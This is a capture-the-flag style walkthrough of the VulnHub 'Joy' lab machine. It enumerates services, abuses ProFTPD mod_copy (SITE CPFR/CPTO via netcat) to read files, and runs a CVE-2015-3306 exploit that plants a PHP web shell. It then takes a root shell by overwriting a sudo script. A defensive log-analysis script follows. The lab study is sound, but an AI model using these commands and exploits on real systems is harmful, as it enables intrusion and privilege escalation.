Digitalworld Joy VulnHub Walkthrough

Note: this post was originally posted on another blog I had in June 2020, and I worked through this VulnHub machine to fix my enumeration and note-taking abilities after failing the OSCP exam the second time.

Digitalworld.local Joy https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

This machine would have been much more complicated if not for enumeration. Most of the work was getting the initial shell, and after that, the box fell quickly.

I learned that if I find a vulnerability with a public exploit, I should calm down, take note of it, and keep enumerating, because there could be other exploits (more reliable or easier). For example, I wasted a lot more time on the dropbear ssh exploit than I should have.

Flow

  1. Enumerate ports and versions
  2. Download all FTP content
  3. Waste time trying to exploit dropbear ssh
  4. Proftpd allows CPFR and CPTO, but exploit needs the web directory (it isn’t default)
  5. Download patrick’s files via TFTP, discovered via SNMP (also possible with the CPFR and CPTO trick; I show both)
  6. Discover web directory from patrick’s files and use proftpd exploit to get a web RCE
  7. Get a reverse shell via RCE
  8. Find patrick’s password and su to patrick
  9. Replace sudo script with CPFR/CPTO trick and get a root shell
  10. Get flag

Initial Enumeration

Nmap – TCP Ports

nmap -sC -sV -p- -oA nmap/nmap_tcp 10.88.42.136
# Nmap 7.80 scan initiated Tue Jun 16 07:54:40 2020 as: nmap -sC -sV -p- -oA nmap/nmap_tcp 10.88.42.136
Nmap scan report for 10.88.42.136
Host is up (0.00046s latency).
Not shown: 65523 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.2.10
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
|_drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2016-07-19 20:03  ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: PIPELINING SASL TOP CAPA STLS AUTH-RESP-CODE UIDL RESP-CODES
|_ssl-date: TLS randomness does not represent time
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: OK LITERAL+ IMAP4rev1 have ENABLE ID more IDLE post-login listed SASL-IR capabilities Pre-login STARTTLS LOGINDISABLEDA0001 LOGIN-REFERRALS
|_ssl-date: TLS randomness does not represent time
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
465/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
587/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
993/tcp open  ssl/imaps?
|_ssl-date: TLS randomness does not represent time
995/tcp open  ssl/pop3s?
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:32:A4:6A (VMware)
Service Info: Hosts: The,  JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: joy
|   NetBIOS computer name: JOY\x00
|   Domain name: \x00
|   FQDN: joy
|_  System time: 2020-06-16T19:54:56+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-16T11:54:56
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 16 07:57:41 2020 -- 1 IP address (1 host up) scanned in 181.15 seconds

Nmap – UDP Ports

SNMP conveniently displays a process listing, netstat info, and installed packages. In addition, it shows a TFTP service running on port 36969 that’s serving patrick’s home directory. I truncated the Nmap output a lot to show that.

nmap -sU -sC -sV -p 1-1000 -oA nmap/nmap_udp_1-1000  10.88.42.136
# Nmap 7.80 scan initiated Tue Jun 16 08:06:13 2020 as: nmap -sU -sC -sV -p 1-1000 -oA nmap/nmap_udp_1-1000 10.88.42.136
Nmap scan report for 10.88.42.136
Host is up (0.00069s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
123/udp open ntp NTP v4 (secondary server)
| ntp-info: 
|_ 
137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
138/udp open|filtered netbios-dgm
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: d1785e76ec962f5c00000000
| snmpEngineBoots: 29
|_ snmpEngineTime: 44m11s
| snmp-interfaces: 
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 5.31 Kb sent, 5.31 Kb received
| Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
| IP address: 10.88.42.136 Netmask: 255.255.255.0
| MAC address: 00:0c:29:32:a4:6a (VMware)
| Type: ethernetCsmacd Speed: 1 Gbps
|_ Traffic stats: 89.38 Mb sent, 241.11 Mb received
| snmp-netstat: 
| TCP 0.0.0.0:21 0.0.0.0:0
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:25 0.0.0.0:0
| TCP 0.0.0.0:110 0.0.0.0:0
| TCP 0.0.0.0:139 0.0.0.0:0
| TCP 0.0.0.0:143 0.0.0.0:0
| TCP 0.0.0.0:445 0.0.0.0:0
| TCP 0.0.0.0:465 0.0.0.0:0
| TCP 0.0.0.0:587 0.0.0.0:0
| TCP 0.0.0.0:993 0.0.0.0:0
| TCP 0.0.0.0:995 0.0.0.0:0
| TCP 127.0.0.1:631 0.0.0.0:0
| TCP 127.0.0.1:3306 0.0.0.0:0
| UDP 0.0.0.0:68 *:*
| UDP 0.0.0.0:123 *:*
| UDP 0.0.0.0:137 *:*
| UDP 0.0.0.0:138 *:*
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:631 *:*
| UDP 0.0.0.0:1900 *:*
| UDP 0.0.0.0:5353 *:*
| UDP 0.0.0.0:36969 *:*
| UDP 0.0.0.0:42070 *:*
| UDP 0.0.0.0:51704 *:*
| UDP 10.88.42.136:123 *:*
| UDP 10.88.42.136:137 *:*
| UDP 10.88.42.136:138 *:*
| UDP 10.88.42.255:137 *:*
| UDP 10.88.42.255:138 *:*
|_ UDP 127.0.0.1:123 *:*
| snmp-processes: 
...
| 754: 
| Name: in.tftpd
| Path: /usr/sbin/in.tftpd
| Params: --listen --user tftp --address 0.0.0.0:36969 --secure /home/patrick
...

FTP – Anonymous FTP

Since anonymous FTP is active and there are files to grab, I decided to grab them all. I’m not sure what the best tool is, but I’ve always used the lftp client to mirror FTP contents.

mkdir ftp
cd ftp
lftp -u anonymous,anonymous -e 'mirror;quit' 10.88.42.136

FTP – FILES

.
./download
./upload
./upload/project_yolo
./upload/project_malindo
./upload/project_woranto
./upload/project_flamingo
./upload/project_bravado
./upload/project_luyano
./upload/project_komodo
./upload/project_desperado
./upload/reminder
./upload/project_okacho
./upload/directory
./upload/project_toto
./upload/project_sicko
./upload/project_zoo
./upload/project_vivino
./upload/project_armadillo
./upload/project_polento
./upload/project_indigo
./upload/project_uno
./upload/project_emilio
./upload/project_ronaldinho

FTP – upload/directory

More confirmation that patrick is a user on the system. It also seems like this is /home/patrick (previously mentioned in the process listing via SNMP).

Patrick's Directory

total 128
drwxr-xr-x 18 patrick patrick 4096 Jun 16 20:10 .
drwxr-xr-x 4 root root 4096 Jan 6 2019 ..
-rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history
-rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc
drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache
drwx------ 10 patrick patrick 4096 Dec 26 2018 .config
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents
drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads
drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg
-rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha
-rw-r--r-- 1 patrick patrick 0 Jun 16 19:50 HmjhT4RkfTh7RIMfqMJWMphRts7EwVJL.txt
-rw-r--r-- 1 patrick patrick 0 Jun 16 19:45 IBrat9JjUMGHJtVsAUfc0CLW3LEP4M15.txt
-rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority
drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local
drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music
drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano
-rw-r--r-- 1 patrick patrick 24 Jun 16 19:45 p2pIHflvQpgys7Io9W7E33H4uFmzwHJpPgViBOlLBHDxi0zqJcrZObfDqPBG6GQ5.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures
-rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public
-rw-r--r-- 1 patrick patrick 24 Jun 16 20:05 qNdejbhnSVcWpNVgYQvrq52kACwqgDUiyvo8Q5JgTZ1dvHcHOGpzFuEqC387wCWx.txt
-rw-r--r-- 1 patrick patrick 24 Jun 16 20:00 QrHTw7iuO4JCToijShVuQMrFcReSv9YV435E3niEYbFmoT50vikNjbsKuqgPGWot.txt
d--------- 2 root root 4096 Jan 9 2019 script
-rw-r--r-- 1 patrick patrick 24 Jun 16 19:50 sh5lebDMlsOns3I7sF7mnHqj5zbuJv9EMc60nGmmUbJOv6tJrDzSRsvJNeoiB0el.txt
-rw-r--r-- 1 patrick patrick 0 Jun 16 20:05 soqjRoS2by1apdqTErDEQTspl2YuWgva.txt
drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt
-rw-r--r-- 1 patrick patrick 0 Jun 16 20:10 U1wNlhsloNt2AHXJZPs9Xi0rIj0gmazP.txt
-rw-r--r-- 1 patrick patrick 24 Jun 16 19:55 u42rsGynarnocbP6FwTiFmnwmLLiHcCQTitVqbHnYYX28K4t43oqp3vjXdSQdbeQ.txt
-rw-r--r-- 1 patrick patrick 0 Jun 16 20:00 uxXpvjuUYMGKvOEDaCFfUFhTmvcvWcm0.txt
-rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos
-rw-r--r-- 1 patrick patrick 0 Jun 16 19:55 xXATmw8ZuarOVbYrxznrcKrPJdYRchUI.txt
-rw-r--r-- 1 patrick patrick 24 Jun 16 20:10 ZxjEw0BVqBxx4KpJ4oDwRvOUbrRVYh8H50OIZyAE47jdGvuBFbIr25hTqvFg1cbL.txt

You should know where the directory can be accessed.

Information of this Machine!
Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux

What I Did Before UDP Scan Finished

Dropbear SSH Exploit Attempt

I wasted too much time getting tunnel vision on trying to exploit dropbear ssh (there’s an old exploit I spent time trying to get to work). It ultimately wasn’t fruitful. There’s an entry in searchsploit for it (exploits/linux/remote/387.c).

ProFTPD Exploit Attempt

I spent time on a searchsploit-provided exploit (exploits/linux/remote/36803.py), but it requires the web directory. I did learn about the CPFR and CPTO commands. I should have tried to use them to get patrick’s files. I’ll show it after the TFTP method (likely the intended method).

What We Now Know

  • patrick is a system user
  • patrick’s home directory is /home/patrick
  • we have a list of patrick’s files that are likely in /home/patrick
  • TFTP is serving /home/patrick

TFTP – Getting Patrick’s Files

Now we need to grab each of patrick’s files from TFTP using the file list. Be sure to remove “.” and “..” from the list of files.

awk '/[0-9] /{print $9}' ftp/upload/directory > patrick_files.txt
# remove . and .. from patrick_files.txt
mkdir tftp
cd tftp
for file in `cat ../patrick_files.txt`; do echo -e "get $file\nquit\n"|tftp 10.88.42.136 36969; done
for i in *; do echo ">> $i <<" && cat $i; done
>> Desktop <<
>> Documents <<
>> Downloads <<
>> haha <<
>> HmjhT4RkfTh7RIMfqMJWMphRts7EwVJL.txt <<
>> IBrat9JjUMGHJtVsAUfc0CLW3LEP4M15.txt <<
>> Music <<
>> p2pIHflvQpgys7Io9W7E33H4uFmzwHJpPgViBOlLBHDxi0zqJcrZObfDqPBG6GQ5.txt <<
Patrick is hardworking!
>> Pictures <<
>> Public <<
>> qNdejbhnSVcWpNVgYQvrq52kACwqgDUiyvo8Q5JgTZ1dvHcHOGpzFuEqC387wCWx.txt <<
Patrick is hardworking!
>> QrHTw7iuO4JCToijShVuQMrFcReSv9YV435E3niEYbFmoT50vikNjbsKuqgPGWot.txt <<
Patrick is hardworking!
>> script <<
>> sh5lebDMlsOns3I7sF7mnHqj5zbuJv9EMc60nGmmUbJOv6tJrDzSRsvJNeoiB0el.txt <<
Patrick is hardworking!
>> soqjRoS2by1apdqTErDEQTspl2YuWgva.txt <<
>> Sun <<
>> Templates <<
>> U1wNlhsloNt2AHXJZPs9Xi0rIj0gmazP.txt <<
>> u42rsGynarnocbP6FwTiFmnwmLLiHcCQTitVqbHnYYX28K4t43oqp3vjXdSQdbeQ.txt <<
Patrick is hardworking!
>> uxXpvjuUYMGKvOEDaCFfUFhTmvcvWcm0.txt <<
>> version_control <<
Version Control of External-Facing Services:

Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12

We should switch to OpenSSH and upgrade ProFTPd.

Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
>> Videos <<
>> x86_64 <<
>> xXATmw8ZuarOVbYrxznrcKrPJdYRchUI.txt <<
>> ZxjEw0BVqBxx4KpJ4oDwRvOUbrRVYh8H50OIZyAE47jdGvuBFbIr25hTqvFg1cbL.txt <<
Patrick is hardworking!

FTP – Getting Patrick’s Files

We can use the CPFR and CPTO trick to put patrick’s files in the upload directory. Be sure to remove . and .. from the file list, or you could fill up the hard disk (yes, I did it). This takes some guesswork if you don’t know where the FTP directory is, but I guessed/knew it was /home/ftp.

for file in `cat patrick_files.txt`; do echo -e "site cpfr /home/patrick/$file\nsite cpto /home/ftp/upload/$file\nquit"|nc 10.88.42.136 21; done
cd ftp && lftp -u anonymous,anonymous -e 'mirror;quit' 10.88.42.136; cd -

Exploiting ProFTPD

We now know the web directory is /var/www/tryingharderisjoy, which is the last piece of information we needed to exploit ProFTPD.

I tried the exploit in searchsploit, but it didn’t work. So I went looking on the web and found https://github.com/t0kx/exploit-CVE-2015-3306/, which works!

[18:10:35]🔥root[ /home/kali/VulnHub/joy ]# python3 exploit.py 
usage: exploit.py [-h] --host HOST --port PORT --path PATH
exploit.py: error: the following arguments are required: --host, --port, --path
[18:10:40]🔴->2 root[ /home/kali/VulnHub/joy ]# python3 exploit.py --host 10.88.42.136 --port 21 --path /var/www/tryingharderisjoy
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 10.88.42.136:21
[+] Target exploited, acessing shell at http://10.88.42.136/backdoor.php
[+] Running whoami: www-data
[+] Done
[18:11:30]🔥root[ /home/kali/VulnHub/joy ]#
http://10.88.42.136/backdoor.php?cmd=COMMAND_HERE

“which nc” returns nothing, so netcat isn’t installed. So, I went back to http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet to see the reverse shell options again.

I tried the bash one, and it didn’t work. So I went to CyberChef to URL-encode the bash reverse shell.

I tried the PHP one (since I know PHP is installed), and it did work. I also went to CyberChef to URL-encode the PHP reverse shell.

[Screenshot: Digitalworld local joy initialshell]

Pivot to the Patrick User

Looking around, the ossec directory is there, so I looked inside of it. There’s a suspect file, “patricksecretsofjoy,” and it contains patrick’s password.

www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy 
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis

how would these hack3rs ever find such a page?
www-data@JOY:/var/www/tryingharderisjoy/ossec$
patrick:apollo098765

I tried to ssh in, but that didn’t work.

$ ssh patrick@10.88.42.136
Unable to negotiate with 10.88.42.136 port 22: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1

I could, fortunately, su to patrick.

[Screenshot: Digitalworld local joy supatrick]

Pivot to Root

There’s a sudo rule that lets patrick run a custom script. Unfortunately, I couldn’t edit or read the file directly.

[Screenshot: Digitalworld local joy patricksudo]

But I could replace its contents using the FTP CPFR/CPTO trick from earlier: the copy is carried out by the FTP daemon rather than by patrick, so the permissions on the root-owned script directory don’t stop it.

cd /dev/shm
echo -e '#!/bin/sh\nsh\n'>test
chmod +x test
echo -e "site cpfr /dev/shm/test\nsite cpto /home/patrick/script/test\nquit"|nc 10.88.42.136 21

Then I ran the sudo command and got a root shell.

[Screenshot: Digitalworld local joy patricksudotoroot]
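The CPFR/CPTO copies used earlier to pull patrick’s files into the FTP upload directory and just now to overwrite the sudo script are the same primitive, and on the defender’s side both leave the same trace in a ProFTPD ExtendedLog. The following is an added example, not code from the original post: it pairs SITE CPFR/CPTO commands per client and flags copies made without an authenticated login or reaching outside the FTP root. It assumes an ExtendedLog written with LogFormat "%t %a %u %r", an FTP root of /home/ftp, and the constructed sample lines embedded in the block.

```python
import re

# Constructed sample lines in the shape of a ProFTPD ExtendedLog written with
# LogFormat "%t %a %u %r" (timestamp, client IP, user, raw command); not real traffic.
SAMPLE_LOG = """\
[16/Jun/2020:18:12:03 +0800] 10.88.42.10 - SITE CPFR /home/patrick/version_control
[16/Jun/2020:18:12:03 +0800] 10.88.42.10 - SITE CPTO /home/ftp/upload/version_control
[16/Jun/2020:18:40:10 +0800] 10.88.42.10 - SITE CPFR /dev/shm/test
[16/Jun/2020:18:40:10 +0800] 10.88.42.10 - SITE CPTO /home/patrick/script/test
[16/Jun/2020:19:03:01 +0800] 10.88.42.50 patrick SITE CPFR /home/ftp/upload/report.txt
[16/Jun/2020:19:03:01 +0800] 10.88.42.50 patrick SITE CPTO /home/ftp/upload/report-copy.txt
"""

FTP_ROOT = "/home/ftp"  # assumed root of the anonymous FTP server
UNAUTH_USERS = {"-", "anonymous", "ftp"}  # "-": no login yet; others: anonymous login
LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] (?P<ip>\S+) (?P<user>\S+) (?P<cmd>.+)$")

def inside(path, root):
    """True if path is root itself or lies beneath it."""
    return path == root or path.startswith(root.rstrip("/") + "/")

def analyze(log_text, ftp_root=FTP_ROOT):
    """Pair SITE CPFR/CPTO per client IP and return suspicious copies as
    (client_ip, user, source, destination, reasons) tuples."""
    pending = {}   # client IP -> source path from its most recent CPFR
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = m["cmd"].split()
        if len(parts) != 3 or parts[0].upper() != "SITE":
            continue
        verb, path = parts[1].upper(), parts[2]
        if verb == "CPFR":
            pending[m["ip"]] = path
        elif verb == "CPTO" and m["ip"] in pending:
            src = pending.pop(m["ip"])
            reasons = []
            if m["user"] in UNAUTH_USERS:
                reasons.append("mod_copy used without an authenticated login")
            if not inside(src, ftp_root):
                reasons.append("source outside FTP root")
            if not inside(path, ftp_root):
                reasons.append("destination outside FTP root")
            if reasons:
                findings.append((m["ip"], m["user"], src, path, reasons))
    return findings
```

Running analyze(SAMPLE_LOG) reports the two unauthenticated copies and stays silent on patrick’s copy inside the FTP root.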

Flag

[Screenshot: Digitalworld local joy rootflag]
